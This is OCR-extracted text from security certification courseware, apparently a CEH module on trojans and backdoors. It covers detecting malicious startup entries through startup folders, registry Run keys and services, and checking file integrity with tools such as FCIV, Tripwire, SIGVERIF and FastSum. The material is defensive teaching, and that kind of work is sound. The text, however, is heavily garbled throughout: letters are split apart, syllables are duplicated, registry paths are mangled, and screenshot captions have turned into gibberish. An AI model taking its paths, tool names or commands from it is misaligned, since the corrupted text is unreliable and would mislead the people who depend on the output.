http://www.manageengine.com
ServiWin
E
h t t p : / / w w w . nirsoft.net . nirsoft.net
Windows Service Service M anager
55
Overseer Network Monitor http://www.overseer-network-monitor.com
Total Total Network Monitor
Tray
http://www.softin\/enti\/e.com
http://winservicemanager.codeplex.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
f
B
W i n d o w s S e r v ic i c e s M o n i t o r i n g T o o ls ls Windows Services monitoring tools monitor critical Windows services and optionally
restart them
a f t e r f a ili l u re r e . A f e w o f th t h e W i n d o w s s e rv r v ic i c e m o n i t o r i n g t o o l s t h a t a r e r e a d i ly ly
available in the market are listed as follows: 0
S m a r t U t i l i t y a v a i l ab ab l e a t h t t p : / / w w w . t h e w i n d o w s c l u b . c o m
0
N e t w r i x S e rv rv i ce ce M o n i t o r a v a i l ab ab l e a t h t t p : / / w w w . n e t w r i x . c o m
0
V i s t a S e r v ic ic e s O p t i m i z e r a v a i l a b l e a t h t t p : / / w w w . s m a r t p c u t i l i t i e s . c o m
0
S e r v i W i n a v a i l a bl bl e a t h t t p : / / w w w . n i r s o f t . n e t
0
W i n d o w s S er er v ic ic e M a n a g e r T r a y a v a i l a bl bl e a t h t t p : / / w i n s e r v i c e m a n a g e r . c o d e p l e x . c o m
©
AnV ir Task M ana ger available at h t t p : / / w w w . a n v i r . c o m
0
P r o ce ce s s H a c k e r a v a i l a b l e a t h t t p : / / p r o c e s s h a c k e r . s o u r c e f o r g e . n e t
0
F re re e W i n d o w s S er e r v ic ic e M o n i t o r T o o l a v a i l ab ab l e a t h t t p : / / w w w . m a n a g e e n g i n e . c o m
0
O v e r s e er e r N e t w o r k M o n i t o r a v a ilil a bl bl e a t h t t p : / / w w w . o v e r s e e r - n e t w o r k - m o n i t o r . c o m
0
T o t al a l N e t w o r k M o n i t o r a v a ili l a bl bl e a t h t t p : / / w w w . s o f t i n v e n t i v e . c o m
Module 06 Page 971
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
C EH
Check start up folder C :\ProgramData\Microsoft :\ProgramData\Microsoft \Windows\Start Menu\Programs'^Star tup C:\Users\(User Nam e)\ AppDa ta\R oami ng\ Micr oso ft\ Win dow s\S tart Menu\Programs'^Star tup
Check start up program
©
entries in the registry Details are covered in next slide
Check Check Windo ws services services
Check Check de vice drivers
automatic started
automatically loaded
Go to Run
C: \ Wi ndow ndows\ Syst em 32\ dr i ver s
Type services.m sc
-> Sort by Startup Type
Check boo boott , i ni or bed ( boot bootm mgr) gr) entri tri es
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
S c a n n i n g f o r S u s p i c io i o u s S t ar a r tu tu p P r o g r a m s Trojans,
once
installed
on
the
computer,
start
automatically
at
system
startup.
T h e r e f o r e , s c a n n in in g f o r s u s p i c i ou o u s s t a r t u p p r o g r a m s i s v e r y e s s e n t ia ia l f o r d e t e c t i n g T r o j a n s . B y f o l l o w i n g t h e s e s i m p l e s t e p s, s, y o u c a n i d e n t i f y i f th t h e r e a r e a n y h i d d e n T r o j a n s: s:
Step 1: C h e c k t h e S t a r t u p f o l d e r
C: \ Prog Pr ogrr amDat a\ Mi cr osof osof t \ Wi ndows\ St ar t Menu enu\ Pr ogr ogr ams\ St art ar t up C: \ Users\ ser s\ ( User ser - Name) \ AppDat a\ Roami ng\ Mi cr osof osof t : \ Wi ndows\ St art Menu\ enu\ Pr ogr ogr ams\ St ar t up ec k W i n d o w s s e rv r v ic ic e s a u t o m a t i c s t a r t e d Step 2: C h ec G o t o Run, t y p e s e r v i c e s . m s c , a n d c l i c k Sort by Startup Type ry Step 3: C h e cckk s t a r t u p p r o g r a m e n t r i e s i n t h e r e g i s t ry rs a r e a u t o m a t i c a l l y l o a d e d : Step 4: C h e c k t h a t d e v i c e d r i v e rs
C: \ Wi ndow ndows\ Syst em32\ dr i ver ver s Check
ie s boot oot . i ni o r bed ( b o o t m g r ) e n t r ie
Module 06 Page 972
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Windows 8 Startup Startup Registr Registry y Entries HKLM\ SOFTWARE\ Mi cr osof t \ Wi ndow ndows\ Curr entVers i on\ Expl or er\ Shel Shel l
Explorer Startup Setting
HKCU\ Sof Sof t ware\Mi are\Mi crosoft \ Wi ndow ndows\ Curr ent ent Ver si on\ on\ Expl Expl orer\ Shel hel l
Fol Fol ders,
ithi ul •UtkM
Cogniti on Start. up
HKLM\ SOFTWARE\ Mi cr osof t \ Wi ndow ndows\ Curr entVers i on\ Expl Expl orer \ User Shel Shel l Fol Fol ders ders ,
Common Star t up
Start up
HKCU\ Sof Sof t ware\Mi are\Mi crosoft \ Wi ndow ndows\ CurrentVers urrentVers i on\ on\ Expl xpl orer\ User She Shel l Fol Fol ders, HKCU\ Sof Sof t ware\ Mi cr osof t \ Wi ndow ndows NT\ Curr ent ent Versi on\ on\ Wi ndow ndows,
Windows Startup Setting
Fol ders ders ,
CEH (•rtifwd
Star tup
l oad oad
HKLM\ SOFTWARE\ Mi cr osof t \ Wi ndow ndows\ Curr entVers i on\ Run HKCU\ Sof Sof t ware\ Mi cr osoft \ Wi ndow ndows\ Curr ent ent Versi on\Run HKLM\ SOFTWARE\ Mi cr osof t \ Wi ndow ndows\ Cur r entVersi on\ RunO RunOnce HKCU\ Sof Sof t ware\ Mi cr osoft \ Wi ndow ndows\ Curr ent ent Versi on\ on\ RunO unOnce
HKCU\ Sof Sof t ware\Mi are\Mi crosof t\ I nternet nternet Expl Expl orer\ Url Search SearchH Hooks ooks
IE
Startup Setting
HKLM KLM\ SOFTWARE\ Mi cr osof t \ I nter net net Expl Expl orer \ Tool Tool bar bar HKLM\ SOFTWARE\ Mi cr osof t Mnter net net Expl Expl orer \ Ext Ext ensi ensi ons ons HKCU\ SOFTWARE\ Mi cr osof t \ I nter net Expl Expl or er \ MenuE enuExt xt
P r o g ra ra m s t h a t r u n o n W i n d o w s s t a r t u p c a n b e l o c a te te d i n t h e s e r e g i s t r y e n t ri ri e s
Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
W i n d o w s 8 S t a rt r t u p R e g i s t r y E n t ri ri e s P r o g r a m s t h a t r u n o n W i n d o w s s t a r t u p c a n be be l o c a t e d i n t h e s e r e g i s t r y e n t ri ri e s :
HKLM\SOFTWARE\Microsoft\windows\Currentversion\Explorer\Shell Folders, Common startup
Explorer Startup Setting
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup HKCU\So ftware\Mi crosoft\Wind ows\CurrentV ersion\Explo rer\Shel1 Folders, Folders, Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup HKCU\Software\Micro soft\Windows NT\CurrentVerslon\Windows, load
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Startup Setting
HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\ Sof Sof t ware\ Mi crosof t \ I nternet nternet Expl Expl orer\ Ur l SearchH earchHoo ook3 k3
IE Startup Setting
HKLM\ S0FTW S0FTWARE\ ARE\ Mi cr o3of o3of t \ I nter net net Expl Expl orer \ Tool Tool bar bar HKLM\ SOFTWARE\ RE\ Mi cr osof t Mnt ernet Expl Expl orer \ Extensi Extensi ons ons HKCU KCU\ SOFTWARE\ ARE\ Mi cr osof t \ I nt ernet Expl or er \ MenuE enuExt xt
FIGU FIGURE RE 6.59: W indow s8 S tartup Registry Entries Entries
Module 06 Page 973
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Startup Pro Pr o g r a ms Monitoring Tool: Starter
CEH
Starter is a startup manager for Microsoft Windows It allows you to view and manage all the programs that are starting automatically whenever OS is loading
File Edit C cn f.guiaton H elp a a a Edit :]rr* " ^Processes |
ections S B tf % All sections(18) 1 jU Startup folden(l) folden(l) Current user g i Allu1*»<1) £* Default user J0 Regiiby iiby (17 17) & Current user(7) J# Run (61 M RunOnce(I) 3 l i Alluwu(IO) H Run(9] j$ RunOnce 3 RunOnceE... H RunServicei 3 RunServic*.. 9 t? Drfaultuser 3 Run 3 RunOnc* I 3 1N1 files
1
Starter(Server4.0)
ra
0 3 ♦ J R efresh1 La□ unch Properti ties Cpboni Abcut
/72m
Seiv Seivii
Vaie (3 tf APC (3* EPSON UD STARE □ i r FlBacleup 9009 9009 lataH ataHi (3 GTWhois •St rronimgr 1nS.na (3 [3 U I Sn:gi: 10.Ink [3 ivcnM ivc nM 0 Title itle (3 Unin-taII C:\Uvc , a r a WinFL inFLTray Tray
(3
Eratt..
^ M a w S iB iRegistry B a-User B Run
C\Program Files les «36.Ad. a ce: Pa renal Control B_ GJ>rog1 GJ>rog1am Filet U36 U3611\M .ancedPa cnul Contf 0l\B_ CAProgram Fie* (r36)\PC Dwe n MeadOujrt cn' D v. 'C:\Progfam Fi*t U96&\Auto Tr* J.*»'dULw•' C:\Progr«mEtles(r96J\Ekom^ctTPasswordRecovery.. C:\Prog1 C:\Prog1amFS« u & '.EVfT.EMfT nctifie «■* ‘CAPtogram fi n (4t*IPSO N P.c|«tor\lPSON US . 6)'.NewvScftware t\f eiderLodcsfC^Program Files (rt (rt6 C:VProqam Edet Tarfk'googlet . G\Program G\Pr ogram Files(x36'.GecfcT00*1'GT\Yh0tJcxe GecfcT00*1' GT\Yh0tJcxe ' C:VP1 C:VP1cg>wnF4n Udbi^WmdoMilA«\)S^agic3_ C:\W1 C:\W1ndcM1 ndcM1 VncM
(196j',G ooglr', ',G oo^ ir
.x
Registry-MachineRun Rejpstry User Run Registry•MachineRun Reysfty UserRun Reystry •Machine Run Re^tb y MachineRun Rcgisoy UserRun Retptby •Machine Run Re^ sory Ma chi ne Run Ray *by -Ut w Run Re^tby •Machine Run Startup ADUsers Reiptby •Machin* Run Regiioy MachineRun-. Registry •User RunOnce Reysoy UserRun
D«c!p!bn
lil) Yes fed v«s
₪Vei bd Vts ₪ Yd ElcomsoftDistributed Passwc EMET Notifiei (Enhanced Mit! EPSON USB Ditplsy VI M [EP'J [EP'J bd YCS (FolderLock) 0V Google Talk lid Yes Window* l v« M«k»«nyar
bdv«
Rv
0V
Isd Ye Snegh
bd Ve: hd V« 0 Vn
5 Wmm
AdobeResdetandAc!0batM anager/1.6.S.0/AdobeReaderandAcro robatM anagerAd>
—ms —ms— —iia —2^2!—*2 —*2s!— laamuuhttp://codestuff .tripod,com Copyright © by
r
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
S t a rt r t u p P r o g r a m s M o n i to t o r i n g T oo o o l: l : S t a rt rt e r Source: h t t p : / / c o d e s t u f f . t r i p o d . c o m
S t a r t e r a l lo lo w s y o u t o v i e w a n d m a n a g e al all t h e p r o g r a m s t h a t s t a r t a u t o m a t i c a l l y w h e n e v e r t h e operating system is loaded. It enumerates all the hidden registry entries, startup folders' items a n d s o m e o f t h e i n i t ia ia l i z a t i o n f ilil e s, s, s o t h a t t h e u s e r c o u l d
choose
to
tem po rarily
d i s a bl bl e
s e l ec e c t e d e n tr t r ie ie s , e d i t t h e m , c r e a t e n e w , o r d e l e t e t h e m p e r m a n e n t l y . Starter can also list all the processes running and with a change to view extended process' information (such as used DLLs, memory usage, thread count, priorities, etc.), and to terminate selected process. It supports Microsoft Windows 9x, Me, NT, 2000, XP, 2003, and Vista. There are
no
s pe p e c i fi fi c
requirem ents
except
one:
registry
ope ration s
on
a Window s-NT-ba sed
o p e r a t i n g s y s t e m m a y r e q u i r e s p e ci ci a l ac ac c es es s r ig ig h t s . A s a ru ru l e , m e m b e r s o f A d m i n i s t r a t o r s a n d Power Users groups have nothing to worry about.
Module 06 Page 974
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
f5 I
I
H j
Starter (Server 4.0)
File
Edit
Configuration a Nev.
Exit -4 StJrtup StJrtupll
9
-
B S
a
B
B ^
Piocr Piocrss ssn
Afl Afl lection lectionss (18) (18) Startup folders (1) ^ Current user Jtt All users (1) £ * Default user user Registry (17) & Current user (7) 3 Run ($) RunOnce (1) 3 S i All users (10) 3 Run (9) 3 RunOnce 3 RunOnceE... 3 RunSetvices 3 RunServKe... S 4 Def ault user 3 Run 3 RunOnce INI INI file filess
3
a
a
Edit
Delete
cl Refresh
a
Launch
3
1
Properties
Optiom
About
\ 4 b Swvkci
S B 63 Name *
Sections ^
Hdp
Vau le !E s a z a E E
Section
C:\Program Files (*86)\Advanced Parental Parental Controf \B~ C:\Pr 09 09 rem Frfes (186)\Advanced Parental Controf B... PI Driver Detective C:\P rogram Files («96)\PC Drivers HeadQuarters \Dnv.. . "C:\Program Files (x (x86)\Auto-Tracker\dtn.exe" ( 3 dtn.exe Password Recovery... Recovery... ElcomSoft DPR S.- C:\Program Files (»86)\Eko msoft Password C:\Program Files (*86)\EME T\EM6T_notrf 1er.exe 0 g EMET Notrfi Notrfief ef 0 i * EPSON UD START "C:\Program Files (*86)\EPSON Projector EPSON US— C:\Program Files (*86)\New$oftware $\F0Wer Lock\F.. . B 6 F L B d c ku p 0 <^> googl etilk C:\Program Files (*86)\ Google\ Google Talc\googlet ... C:\Program Files (*86)\GeekTools\GTWho*s.ece 0 GTWh GTWhois ois "C:\Program Files (x (x86)\Windows Lrve\Messenger\m... Lrve\Messenger\m... 0 i l msnm msnmsgr sgr "C:\Program Files(x86)\ActrveTracker\m5.ex (x86)\ActrveTracker\m5.exe* e* ( 3 m5.exe C:\Program Files (x86)\TechSm*h\Snagft 10 »Snag1t 3 ... [ 3 (B Soag Soagrt rt lO.Ink lO.Ink ( 3 svcnet2 C:\Windows\svcnet2Vsvcnet2.exe UnHackMe Rootkit Check 0 Ti tltl e 0 Uninstall Uninstall C:\User... ser... C:\W1ndows\system iAcmd .exe .exe/q /c rmdw /* /q "G~ C:\W1ndows\SysWow64' WmFLTray.exe (3 B WmfL WmfLTr Tray ay (3 11 APC APC
Oetavtam
cza e
*k
Registry Registry • User Run Registry Registry Machine Run Run Registry •User Run Registry • Machine Run Run Registry Registry - User Run Registry - Machine Run Registry Registry • Machine Run Registry • Uset Run Registry Machine Run Registry - Machine Run Registry Registry • Uset Run Registry Machine Run Run Startup All Users Registry Machine Run (k 9 «t y - Machine Run... Regis Registry User RunOnce Registry User Run
&
' 13
Yes (Bac (Backk Proce Process ss)) Yes (Bac (Backk Proce Process ss)) Yes Yes Yes Elcomsoft Elcomsoft Distributed buted Pas Passw swcc (Enhanced M it fm EMET Notifier (Enhanced Yes EPSON US8 Display VI.40 (EP Yes (Folder Lock) Yes Google Talk Yes 1 j • 1 Yes Yes Yes Soag Soagit it «a
< < f m Yes Yes
Tray ApplKation (Folder Lock
Wm.1m
Adobe Reader and Acrobat Manager / 1.6.5.0/ Adobe Reader Reader and Acrobat Manager / Adobe Systems Incorporated
FIGURE 6.60: 6.60: Starter Tool Screenshot
Module 06 Page 975
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Startup P rog r ams Monitoring Monitoring Tool: Secu Securi rity ty A u t o R u n S e c u r i ty ty A u t o R u n d i s p l a y s t h e
ClEH
Urtrft ftetf (lhKj| N«Im
list of all applications that are loaded automatically when Windows starts up _
1 ■ rj
Securit ityA yAutorun ;WIN-M SSElCK4K41/Ac1m 1n1strator]
-I" « o o
4- —
N -
S t a rt r t u p P r o g r a m s M o n i t o r in i n g T o ol o l : S e c u r i ty ty A u t o R u n Source: h t t p : / / t c p m o n i t o r . a l t e r v i s t a . o r g
Security AutoRun allows you to view the list of all applications that are loaded automatically wh en W ind ow s starts up.
E ac ac h a p p l i c a t i o n i s l is is t e d w i t h t h e d e t a i l s o f i ts ts t y p e , r e g i s tr tr y ,
common/user, services, drivers list, command-line string, product name, file version, company name, location in the registry or file system, and more. It identifies a spyware or adware program
th at
runs
at
s t a r tu tu p .
C o m p a t i b le le
ope rating
s y st st e m s
of
Window s
are
9x/ME/NT/2000/XP/Vista/7.
Module 06 Page 976
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
ls
Security Security Autonvt - [WIN M SStlC K4K4 K4K4 VAdmmistMt or]
is m m
o o 4A Cur crtUMr
¥ **»)
^ *»/ Ox*(I) (I) ¥ •alOM
¥ »* 0 ^ ft
*
IMdfttf* IMdfttf*
5 sun*fcMr) (l)
*ppk*S0wl* t«r i UM i i«r «a
¥
V Ox•C •CO) ¥ ^rOnab
»0
Nrt wert t lr «w«neQnr p
V ^rS«^(«Ch» *
?alo ?aloes es
*
Sh««Ct»»Kt(0
C V r t » X 1 * $ yt1V0»^4 yt1 V0»^4 y/W/ W / Vi f r « » V *
JP Nryca(SS
C:tMr4^*4aWl*rtrramm«64vX0**F'rt«• ^<7 •Mh(*•6:600* Ux)•* « .. t f-o^in f-o^inHn(06!Coc^U*tet»£oo*«jpd•*♦
O >Ntr
C:»wnd»we7WlMgeit it.r*• *•
4 Q>Mrl« Q>Mrl« 4
w
c:fro rogr«nN nN««(> (>M)CPSONPro^KtorCPiONUS80 »-
^ w itvipSrMon
4
C:^ftndaw»y»gc< c1Ufcv*0tt.C■*4** 4***gx C:Wndowe)m )m»e«MWwvc-w -w c
instat o) Components
49 miogan ¥ wgon QSt*ru>W 0 «r
:
* * c a j / * r Ox Ox »< »< i )
#1Md nw1 | tt «Txocu/Mm^ui | 0 •«CU/OnMo» j # Muafft Muafftrt rtro roB B *HMCU1 j v MoOu'i I 1_i SdwA*tfT*a I ‘ tnM « # tWI O** | *j *HMCU1 Sart«(Mrvat> rvat>-(n|| -(n|| 0 I M | A **Own 1 # mw tm Om m I # 1im/»^otnct(1) | V HtM/SifiOaCi _ Sart«(M S*r*ctN««* Cyrtrx**.-*XNY f*TS*0 *0*V&^0 V&^0 *ctxrr • «W$ fcM0 fcM0»*rt0 »*rt0rrV»*b *bS4TMCN
3) r/QaCUl Si CUUM 3) App|r«0lU
X:ft9l*NN(1M)yMl%«nraS4r1<(t^
C'Ar«M «»rt«^«Uywr>K f>* /If
g *Opt"* *Opt"*
^ Ta*S<*adJar ♦ .Start*
> tt*o(0)
^ t t i k A n (} (} )
Nr«n*t*Sor Mcrwoft 0* 0* Owgnotacs $«*0 • O«o» Sasc*tngrw
OWotSofrw rwft Pmkjp*
POQOW fct
Wtfp fprw Wvm
Per
3
B< V ) *• mt
C: Wr ^ei wW DW wr>r - »«W»«. SQLw» C prtS rtS•*W V'tfrv 'tfrvn#
X *>07*•H" WCo~*>n 9w4\ .. Xff-ogr !Nn (*♦6)<0 0 Nutat Nut ate* e* 9w»d’, X:1^0yw■NetComienN nN»ef40eee^$ ^$hsndvy*cv Hn (»M:r«ttUp :r«ttUp«YM«*•** *•**4 4 **«’ 1 iw^fOQOKioyfOQ M X:*o*• •H" 0*9V*W C'AW'iSo••
HKt Y.lOCAl.MACMtj r SYS
FIGURE 6.61: 6.61: Security AutoRun Tool Screenshot
Module 06 Page 977
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Startup Pro Pr o g r a ms Monitoring Tools
©
Absolute Startup manager
Program Starter
h t t p : / / w w w . absolutestartup. . absolutestartup. com
http://www.ab-tools.com
ActiveStartup
Disable Startup
http ://www . hexilesoft. hexilesoft. com
h t t p : / / w w w. disables tartup. tart up. com
StartEd Lite http://www.outertech.com
C EH
StartupMonitor t
a
t
http://www.mlin.net
Startup Inspector
Chameleon Startup Startup Manage r
h t t p : / / w w w . windowss . windowss tartup.com
http://www.chameleon-managers.com
Autoruns for Window s
1 1 1
http://technet.microsoft.com
Startup Booster http://www.smartpctools.. com http://www.smartpctools
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
S t a r tu t u p P r o g r a m s M o n i t o ri ri n g T o ols A l is is t o f S t a r t u p p r o g r a m s m o n i t o r i n g t o o l s a r e as as f o l l o w s : 0
A b s o l u t e S t a r t u p m a n a g e r a v a i l ab ab l e a t h t t p : / / w w w . a b s o l u t e s t a r t u p . c o m
0
A c t i v e S t a r t u p a v a i l a bl bl e a t h t t p : / / w w w . h e x i l e s o f t . c o m
0
StartEd Lite ava ilable at h t t p : / / w w w . o u t e r t e c h . c o m
0
S t a r t u p I n s p e c t o r a v a i la la b l e a t h t t p : / / w w w . w i n d o w s s t a r t u p . c o m
0
A u t o r u n s f o r W i n d o w s a v ai a i la l a b le le a t h t t p : / / t e c h n e t . m i c r o s o f t . c o m
0
P r o g r a m S t a r t e r a v a i l a bl bl e a t h t t p : / / w w w . a b - t o o l s . c o m
0
D i s a b le le S t a r t u p a v a i l a b l e a t h t t p : / / w w w . d i s a b l e s t a r t u p . c o m
0
S t a r t u p M o n i t o r a v a ilil a b le le a t h t t p : / / w w w . m l i n . n e t
0
C h a m e l e o n S t a r t u p M a n a g e r a v a i l ab ab l e a t h t t p : / / w w w . c h a m e l e o n - m a n a g e r s . c o m
0
S t a r t u p B o o s t e r a v a i l ab ab l e a t h t t p : / / w w w . s m a r t p c t o o l s . c o m
Module 06 Page 978
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scanning fo for Suspicious Suspicious File Files s and Folde Folders rs
CEH
Trojans normally m odify system's files and folders. Use these tools to d etect system changes
SIGVERIF
TRIPWIRE
FCIV I t is is a c o m m a n d l i n e u t i l itit y t h a t
I t is is a n e n t e r p r i s e c l a s s s y s t e m
I t c h e c k s i n t e g r i t y o f c r i t i c a l f ilil e s
c o m p u t e s M D 5 o r S H A1 A1
integrity v erifier that scans and
t h a t h a v e b e e n d i g i t a llll y s i g n e d
r e p o r t s c r i titi c a l s y s t e m f i l e s f o r
by Microsoft
c r y p t o g r a p h i c h a s h e s f o r f ilil e s
changes
C:\ C IV>fciv\.exe IV>fciv\.exe c:\hash.txt / / File File Checksum Checksum Integ rity Verifier Verifier version 2.05.
//
tripwire.
6blfb2f76cl39c82253732elc8824cc2
C: \ hash. txt
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
S c a n n in g f o r S u s p ic io u s F ile s a n d F o ld e r s Usually w hen a system gets infe cted by a Trojan, it modifie s the files and folders; yo u c a n sc sc an an t h e f ilil e s an an d f o l d e r s w i t h t h e f o l l o w i n g t o o l s i n o r d e r t o d e t e c t t h e T r o j a n s i n s t a l l e d .
F C IV
^
v
Fi l e C h ec e c ks k s um u m I n t e g ri r i ty t y V e r i fi f i e r ( F C I V ) is is a u t ili l it i t y t h a t c a n a lll l ow o w yo y o u t o g e n er e r at at e M D 5
or SHA-1 hash values for files that can be verified with the standard values to determine any c h a n g e i n t h e m ; i f f o u n d , y o u c an an r u n a v e r i f i c a t i o n o f th th e f i l e s y s t e m f i l es es a g a i n s t t h e X M L d a ta t a b a s e t o d e t e r m i n e w h i c h f ili l e ess h a v e b ee e e n m o d i f ie i e d . I t i s a c o m m a n d - p r o m p t u t i l it it y t h a t c o m p u t e s a n d v e r i f i e s c r y p t o g r a p h i c h as as h v a l ue u e s o f al al l y o u r c r i t i c a l fi f i l es es a n d s a ve ve s t h e v a l u e s i n an XML file database.
C: \ CI CI V>f ci v\ .ex .exe c: \ hash. sh. t xt / / Fi l e Checksu cksum m I nt egr i t y Ver i f i er ver si on 2. 2. 05. //
6bl f b2f 76cl 76cl 39c82 c82253732el c88 c8824cc2 c : \ hash. sh. t xt T r ip w i r e — ©© Source: h t t p : / / w w w . t r i p w i r e . c o m
Module 06 Page 979
Ethical Hacking and C ounterm easures Copyrigh t © by EC-C EC-COU OUIIC IICilil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Tripwire
Enterprise
provides
Exam 312-50 Certified Ethical Hacker
the
configuration
control
capabilities
organizations
need
to
proactively secure the entire infrastructure and ensure compliance with internal policies, regulations, and industry standards and benchmarks. “
S IG V E R IF Source: h t t p : / / b o o k s . g o o g l e . c o . i n
SIGVERIF is a signature verification tool that allows you to find signed and unsigned drivers connected to the system. When you find any unsigned driver, you can move that to a new folder and restart the system and test the program and functionality for errors. The following a r e t h e s t e p s t o i d e n t i f y u n s i g n e d d r i v e rs rs : Q
Click Sta rt, click Run, typ e SIGVER SIGVERIF, IF, and th en click
OK.
9
C lili ck ck t h e A d v a n c e d b u t t o n .
e
C lili ck c k t h e o t h e r f ilil e s t h a t a re re n o t d i g i t a l ly l y s ig i g n e d. d.
9
N a v ig i g a te t e t o w i n n t \ s y s t e m 3 2 \ d r i v e r s f o l d e r a n d t h e n c lili ck ck OK .
After SIGVERIF finishes, it checks all the unsigned drivers and lists are displayed on the c o m p u t e r . T h e i n v e s t i g a t o r c a n f i n d t h e l i s t o f al al l s i g n e d a n d u n s i g n e d d r i v e r s f o u n d b y SI SI GV GV ER ER IF IF in
s i gver i f . t xt xt i n t h e %wi ndi ndi r %f o l d e r , t y p ic ic a l l y t h e w i n n t o r w i n d o w s f o l d e r .
Module 06 Page 980
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
File Files s an and Folder Folder Integ Integri rity ty Checker: FastS FastSum um and W i n M D 5 W1nMD5V2.07 (Cl 2003-2006 by eolsonS'mi tedu
- I ! x
http://www.blisstonia.com J
W i n M D 5 i s a W i n d o w s u t i l i t y f o r c o m p u t i n g th th e MD5 hashes ("fingerprints") of files
J
These fingerprints can be used to ensure that the file is uncorrupted
http://www.fastsum. http://www.fastsum.com -1 FastSum is used for checking inte grity o f the files -J
It com putes checksums according to the M D5 checksum a lgorithm
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
j F i le s a n d F o l d e r I n t e g r it y C h e c k e r : F a s t S u m
a n d W in M D 5
A fi f i le le s a n d f o l d e r i n t e g r i t y c h e c k e r a l lo lo w s y o u t o m o n i t o r t h e i n t e g r i t y o f f ili l e s a n d folders and check for any changes in the critical files, indicating potential intrusion attempts. These w ork w ith a suite of security tools to provide a com plete a udit and mo nitoring solution f o r OS S a n d G u a r d i a n f i l e s y s t e m s . FastSum Source: h t t p : / / w w w . f a s t s u m . c o m FastSum is built on the well-proven MD5 checksum algorithm, which is used worldwide for c h e c k i n g t h e i n t e g r i t y o f th th e f i le l e s . Y o u c a n t a k e c o n t r o l o f y o u r d a t a w i t h F a st s t S um um . F i n g e r p r i n t y o u r i m p o r t a n t f ilil e s n o w a n d c h ec e c k t h e i n t e g r i t y a f t e r a n e t w o r k t r a n s f e r o r a CD CD b u r n i n g s i m p l y b y ta ta k i n g t h e f i n g e r p r i n t s a g a in in a n d c o m p a r i n g t h e m w i t h t h e p r e v i o u s l y m a d e o n e s . I n t h e s a m e w a y , y o u c a n a ls ls o f i n d o u t w h e t h e r y o u r f i le le s h a d b e e n d a m a g e d b y v i r us us e s , n e t w o r k i ss ss ue ue s, s, o r C D / D V D b u r n i n g f a i l u r e s .
Module 06 Page 981
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
FattSum 1.7 IUnr«g IUnr«g>?t«f*d >?t«f*d l
t * !(•» !(•» ftft**
Om
X ► * Ti OmiiNllavffivttiliMvyiuMirttsvriiictaaiwad
*«* K»j» *rfV r*JH r*JHy«c
P m t * £ •* •* * Cm * 5 w i r » w
et*ta
9
n« tr of •* •
D DncW'e'JfjT' r.f*h r.f*h« « * ® c**jdfc 4 ) E U > /* > r w v iw V “1- — *» Pca#11 Pca#11pr® pr®
So. «N I U«B 1^5 •® •® 7. « JBM 2KB
' " f• !
on ««
1 •*? — # ] deeeopn
Chpcxm^vfM r.0*U~*£ 1 » ^ D D W H f5 K W 4 ( C J 4 r « W « « 5 W 3 ’ w c c € f fw fw 4^ 5 « 0 >? 1€« 13t3LfU4tU:tlWMi2nt2rtM44*a 4ACaaefSlS35CS£2t37SX1«Bltft6l7 >4 •t F4J! F4J! h : E iTf l [1:>3i >3i C3I24 C3I24U5iA885tA2»U«2X1WH 6* 2CW«^MEFfv!rEA«7??nRB273
• U y V U 4D 4D U 4 .1 .1 M M M l S« S« e C «U «U A 54AS647711J 7A4271Mf &Cto££E 7X& MS Ml 44ji^EtfX»M0E*juCC£*]14!1tai 5HCttOFMf DK&6E4D7562t3£X6? ?K1»*aCPClKWfiC5«CMEFE7«ll
P
•
IM
{? f*M* j\
SMptrM
j
A
C*a« C*a«Ml Ml froc«MKmI*10* •* /VXII?6 /VXII? 64 ♦PH D**C«nQ»* 7 !** * ? Up*
10*
